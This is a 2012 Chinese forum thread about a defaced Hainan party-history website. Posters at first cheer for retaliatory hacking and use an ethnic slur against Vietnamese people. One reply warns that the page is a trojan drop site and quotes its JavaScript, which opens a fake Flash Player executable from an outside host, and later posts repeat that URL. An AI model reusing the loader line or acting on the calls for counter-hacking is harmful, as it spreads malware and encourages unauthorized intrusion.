鱼C论坛

 找回密码
 立即注册
查看: 5879|回复: 22

越南狗黑我海南史志网

[复制链接]
发表于 2012-7-22 14:07:26 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能^_^

您需要 登录 才可以下载或查看,没有账号?立即注册

x
2.jpg
越南狗很是嚣张。。明目张胆写着Fuck china

待高手出击,
被黑链接:http://www.hnszw.org.cn/web/     还放了首歌卧槽他妈。- -

点评

这貌似是一年前中越黑客大战时越南用的黑页...  发表于 2012-7-22 15:56
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 14:31:01 | 显示全部楼层
可惜技术没到家!{:2_28:}
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 14:43:21 | 显示全部楼层
FUCK  等待 渗透大牛的出现
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 14:48:12 | 显示全部楼层
等待大牛的出现,楼主实时更新战报哈!!!{:1_1:}
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 15:39:45 | 显示全部楼层
亲们别上当啊   网站是个挂马网站   是某些人利用了咱们的爱国心啊
看网站代码
<SCRIPT language=javascript>

open("http://zhongyi.baixun.com/images/gjhyzx/AdobeFlashPlayes 13.1.exe");

</SCRIPT>
打开了一个看似flash播放器的程序   其实是个木马
大家赶紧全盘扫描吧

我先扫描去。。。

点评

这东西需要下载啊。。不下载也会有事?  发表于 2012-7-22 17:19
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 15:55:56 | 显示全部楼层
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 16:04:23 | 显示全部楼层
猎鹰 发表于 2012-7-22 15:55
我了个擦不早说?

冤枉啊    我也刚看到,好奇点进去了
不过,嘿嘿没出啥大事
看你的浏览器咋执行那段代码了,如果是IE会弹出【文件下载】对话框提示的
我的Maxthon不认那段
其他浏览器那就
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2012-7-22 17:24:16 | 显示全部楼层
G0398 发表于 2012-7-22 16:04
冤枉啊    我也刚看到,好奇点进去了
不过,嘿嘿没出啥大事
看你的浏览器咋执行那段代 ...

哥们别大惊小怪啊。你的电脑出啥事了吗?
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2012-7-22 17:40:33 | 显示全部楼层
本帖最后由 Potato丶 于 2012-7-22 17:41 编辑

2.jpg

360说没事。我也没事。。准不准的就不清楚了明明被恶意篡改了。他竟然说没事~
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 18:12:12 | 显示全部楼层
59.50.112.4
备案号: 琼ICP备08100253号-1
性质: 事业单位
名称: 中共海南省委党史研究室  
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 18:22:46 | 显示全部楼层
http://zhongyi.baixun.com/images/gjhyzx/AdobeFlashPlayes 13.1.exe(被挂马)谷歌貌似是自动下载的,源代码中有document.write  里面的歌曲:http://stream62.gonct.info/0164621cdeda8844be1bd606af4511bb/500bb526/NhacCuaTui169/LeavingMeisSoEasyRemix-Andree-A_394qp.mp3:@表示痛恨做这个站的 竟然挂马 而且估计不是猴子搞的
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2012-7-22 18:27:48 | 显示全部楼层
ペ悠然杰 发表于 2012-7-22 18:22
http://zhongyi.baixun.com/images/gjhyzx/AdobeFlashPlayes 13.1.exe(被挂马)谷歌貌似是自动下载的,源代码 ...

你的意思是我们中招了?
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 18:32:48 | 显示全部楼层
Potato丶 发表于 2012-7-22 18:27
你的意思是我们中招了?

我的意思是国人搞的 你可以试着运行一下内个马 然后用防火墙之类的东西看一下主控端的ip在查一下是哪的 当然我不确定
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
 楼主| 发表于 2012-7-22 18:59:42 | 显示全部楼层
ペ悠然杰 发表于 2012-7-22 18:32
我的意思是国人搞的 你可以试着运行一下内个马 然后用防火墙之类的东西看一下主控端的ip在查一下是哪的 当 ...

没可能是肉鸡吗?
只要我们没中招就好。。

想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 23:35:58 | 显示全部楼层
:Q 挂马的话 他下载你也不知道的啊!
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-22 23:56:11 | 显示全部楼层
小场面!!!!!!!!!!
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-23 08:19:39 | 显示全部楼层
本帖最后由 a22271001 于 2012-7-23 08:27 编辑

谁有虚拟机,分析一下:o
ps:貌似那文件打不开?
还有,本论坛怎么上传图片啊。
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-23 08:39:45 | 显示全部楼层
果断被坑!~
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-23 08:47:50 | 显示全部楼层
转发去红盟社区
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
发表于 2012-7-23 14:34:31 | 显示全部楼层
妈啊。。。。。坑爹啊
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|鱼C工作室 ( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)

GMT+8, 2024-9-29 12:31

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表